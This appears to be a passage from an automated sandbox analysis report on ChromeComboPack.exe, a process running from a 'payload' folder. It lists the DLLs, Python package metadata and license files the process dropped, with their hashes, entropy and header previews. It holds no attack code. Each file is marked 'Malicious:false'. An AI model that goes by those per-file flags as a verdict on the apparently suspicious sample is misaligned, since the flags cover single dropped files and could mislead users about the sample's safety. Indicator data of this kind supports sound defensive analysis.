                                                                                                                                                                                                                                            SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                            SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7900672
                                                                                                                                                                                                                                            Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                            MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                            SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                            SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                            SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(...(...(...!...:...8...*...8...,...8... ...8...9...c..&...G...*...(...+...`...V...(.....`...)...`...)...Rich(...........................PE..d....j.f.........." ...).`Z..V........X.......................................x...........`.........................................p.r.......r...............t...............x......Cj.T....................Cj.(....Aj.@............pZ..............................text...._Z......`Z................. ..`.rdata..ZR...pZ..T...dZ.............@..@.data....+....r.......r.............@....pdata........t.......s.............@..@.reloc........x.......w.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5191960
                                                                                                                                                                                                                                            Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                            MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                            SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                            SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                            SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):787224
                                                                                                                                                                                                                                            Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                            MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                            SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                            SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                            SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202008
                                                                                                                                                                                                                                            Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                                            MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                                            SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                                            SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                                            SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):68376
                                                                                                                                                                                                                                            Entropy (8bit):6.148788033723542
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/D:BDmF61JFn+/O/BI1L057Sy+xF
                                                                                                                                                                                                                                            MD5:8DBE9BBF7118F4862E02CD2AAF43F1AB
                                                                                                                                                                                                                                            SHA1:935BC8C5CEA4502D0FACF0C49C5F2B9C138608ED
                                                                                                                                                                                                                                            SHA-256:29F173E0147390A99F541BA0C0231FDD7DFBCA84D0E2E561EF352BF1EC72F5DB
                                                                                                                                                                                                                                            SHA-512:938F8387DCC356012AC4A952D371664700B110F7111FCC24F5DF7D79791AE95BAD0DBAF77D2D6C86C820BFD48A6BDBE8858B7E7AE1A77DF88E596556C7135ED4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.................PE..d......f.........." ...(..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927640
                                                                                                                                                                                                                                            Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                                            MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                                            SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                                            SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                                            SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):134656
                                                                                                                                                                                                                                            Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                                            MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                                            SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                                            SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                                            SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                                                            Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                                            MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                                            SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                                            SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                                            SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7634
                                                                                                                                                                                                                                            Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qnJvhVL0qhYqlpIle4RrJQSqOBng4kS/cKM6b:4vjxhYWpce48engvK
                                                                                                                                                                                                                                            MD5:8466CFC6533376D42EFA6F7423F2B8E8
                                                                                                                                                                                                                                            SHA1:2BC8926FDBB07DB2AF0A8E3FF7A3BE545C8BDF6B
                                                                                                                                                                                                                                            SHA-256:ADE78D04982D69972D444A8E14A94F87A2334DD3855CC80348EA8E240AA0DF2D
                                                                                                                                                                                                                                            SHA-512:CC45DC470E107E63659B502F77E9EF44335F9427BE87639252D85181A8DEA65FA9D1B5F1BD196F782186BC61B144467888199537806A8CC15E2B462CAC0D46A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with very long lines (855)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15006
                                                                                                                                                                                                                                            Entropy (8bit):4.800156894367144
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:S037UxjwUbQd1Ak++k59jg8dXRNInXF2IOxcme+kQBd9Clb:d37U1LbQd1Z+3e8dhwXFacb+kQjQb
                                                                                                                                                                                                                                            MD5:542BA4FBC993C39A0BC952BE72E8717F
                                                                                                                                                                                                                                            SHA1:4310DB58F98C12B23286E5FA37F0E27ABEFB6A4A
                                                                                                                                                                                                                                            SHA-256:3800D9B91DCEEA2065A6ED6279383362E97AC38B8E56B9343F404EE531860099
                                                                                                                                                                                                                                            SHA-512:E3672EA056E5F2EFD3685C98DC0CF47E9A44F5A84DC457FC8AB31CD6DE09559C6E566D2D00F5B3CE55511E81A050DBB0DED6CF941916A6FF1019392FD96E1636
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1308
                                                                                                                                                                                                                                            Entropy (8bit):5.721750099226425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:kn/2zDcMvX4owkE+RlpGUttyvUMDtuH5p4D127cyOMT34:knuXNv4LkEMl0UWMF5p45AcuT34
                                                                                                                                                                                                                                            MD5:52BF4937018B88B9D28ED98A76B5E2AC
                                                                                                                                                                                                                                            SHA1:C8D5B732C154A2D4D501454647FAFEB356B93C4E
                                                                                                                                                                                                                                            SHA-256:822BBA66B41526FA547186B80221F85DA50D652BEE5493DBFE5D14085112F0C3
                                                                                                                                                                                                                                            SHA-512:30E4DEFE09FB8907166682F9A33E0F7CC0203B65113155BBEC6548A1EADF7250882AF295FF2551803703274F9F387E00439D95CBBCB63D2E04E371B94556B3EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlViJR4KgP+tPCCfA5S:RtBMwlVifAWBBf
                                                                                                                                                                                                                                            MD5:88F09A0EC874FD86ABCB9BC4E265B874
                                                                                                                                                                                                                                            SHA1:786AB44FFD2F5C632B4DC5C1BF4AA2E91E579A05
                                                                                                                                                                                                                                            SHA-256:DB07A93359E4E034B8785A58AD6D534EA3DCA0635F1E184EFE2E66E1C3A299BA
                                                                                                                                                                                                                                            SHA-512:7FFEF1EC782D590D2879294C2895A5A8064ECD5FE7243CF602FCCE66A8A715F64436F17CE96070B613123847EE0C18AB0AA5BC87DB13E98A792DC07DD95E4BAB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12
                                                                                                                                                                                                                                            Entropy (8bit):3.084962500721156
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:5EEln:aM
                                                                                                                                                                                                                                            MD5:C3FBD7931840D987F261BEBA8C77C4D2
                                                                                                                                                                                                                                            SHA1:F7EE740BCB5C39966173CC377817A157D55844F7
                                                                                                                                                                                                                                            SHA-256:0337E180A292F04740C16513485F2681E5506D7398F64A241C1EA44AAC30AAED
                                                                                                                                                                                                                                            SHA-512:E1FA2DE0EE416AE68C57A0173C82D42A8F24DDD1E5143A1B76A3743B5EC3DDF11FB3950F27469D3D8FCAC4958CE267A7321D2F888671EDD7C2E95D0F3F8F7455
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:autocommand.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2020
                                                                                                                                                                                                                                            Entropy (8bit):5.0469065437932175
                                                                                                                                                                                                                                            Encrypted:false
